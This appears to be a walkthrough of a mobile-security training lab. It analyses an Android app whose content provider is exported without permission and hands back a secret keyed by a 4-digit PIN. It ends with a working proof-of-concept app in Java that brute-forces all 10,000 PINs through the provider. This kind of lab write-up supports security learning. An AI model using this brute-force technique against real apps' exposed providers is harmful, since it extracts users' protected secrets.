[Walkthrough] Mobile Hacking Lab — Secure Note

Mobile Hacking lab Secure Notes

Objective:

Retrieve a PIN code from a secured content provider in an Android application.

APP UI:

This is the app’s first screen.

Here we can see that it accepts maximum 4-digit pins and gives an error upon entering the wrong pin. To solve this challenge, we’ve to find out the correct pin.

Let’s open this app with jadx to understand.

Decompile the app:

After decompile the app’s source code we can see that we have one activity(MainActivity) & one content provider exported without any permission definition in AndroidManifest.xml file. It means that any application can query data from this provider. Let’s take a look in the MainActivity.

Digging into MainActivity:

Inside the onCreate() method there is an on click listener with the submit button. Here our enterd pin takes this and call the “querySecretProvider(enteredpin)” method with the enterdpin argument.

let’s explore this method:

Here we can see that our entered pin recieves the pin parameter in the querySecretProvider method & create a selection variable and adding our given pin value after the “pin=” string. after this it send queries to provider with content://com.mobilehackinglab.securenotes.secretprovider this uri. then it checks is the returned value is null or not if not null then it prints the returned data to screen.

Now, let’s inspect the exported SecretDataProvider content provider:

Here inside the onCreat() method it,

Reads the config.properties file which is stored inside the application assets folder.The base64 encoded values read from the above file are decoded and respective class variables encryptedSecret, salt, iv are initialized. The iterationCount variable is also initialized with the value from the config.properties.

When we query a data from this content provider the query method runs.

It takes our entered pin from the selection variable then checks is it null or not, if not then it starts with the pin= srtring.then it removes the string pin= from the selection variable.

For example, if selection is "pin=1234", after executing this line of code, removePrefix will contain "1234".

3. Call the decryptSecret() method with the 4 digit pin argument that obtained from the previous step.

decryptSecret() :

Here we see that the PIN is used as the decryption key.

Here I’m creating an app to exploit this vuln,

package com.provider.poc;

import androidx.appcompat.app.AppCompatActivity;

import android.annotation.SuppressLint;
import android.content.ContentResolver;
import android.database.Cursor;
import android.net.Uri;
import android.os.Bundle;
import android.util.Log;

public class MainActivity extends AppCompatActivity {

@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);

Uri uri = Uri.parse("content://com.mobilehackinglab.securenotes.secretprovider");
for(int i =0; i<10000; i++){
String selection = "pin=" + String.format("%04d",i);
Cursor cursor = getContentResolver().query(uri, null, selection, null, null);
if(cursor != null){
while (cursor.moveToNext()){
String result = cursor.getString(1);
Log.d("Secret_Pin", i + " : " + result);
}
}
}
}
}

Thanks for reading till End we will meet in next article.

Linkedin: https://www.linkedin.com/in/sh3zan/